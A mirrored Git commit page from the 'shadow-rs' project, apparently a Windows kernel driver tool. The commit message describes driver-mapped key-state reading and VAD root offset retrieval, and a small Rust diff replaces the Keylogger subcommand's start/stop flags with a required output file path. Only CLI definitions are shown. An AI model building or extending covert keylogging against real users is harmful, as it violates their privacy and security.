mirror of
https://github.com/joaoviictorti/shadow-rs.git
synced 2026-01-26 10:44:32 +01:00
feature(driver): remove loop/thread for key state reading, added VAD root offset retrieval
- Removed the loop and thread for reading key states; now the client handles this, as the driver maps the address to user mode. - Added a function to retrieve the VAD root offset. - Refactored various parts of the code for clarity and performance.
This commit is contained in:
@@ -288,13 +288,9 @@ pub enum MisCommands {
|
||||
|
||||
/// Operations related to Keylogger.
|
||||
Keylogger {
|
||||
/// Stop the keylogger.
|
||||
#[arg(long)]
|
||||
stop: bool,
|
||||
|
||||
/// Start the keylogger.
|
||||
#[arg(long)]
|
||||
start: bool,
|
||||
/// File path for storing keylogger output
|
||||
#[arg(long, required = true)]
|
||||
file: String,
|
||||
},
|
||||
|
||||
/// Operations related to ETWTI.
|
||||
|
||||
Reference in New Issue
Block a user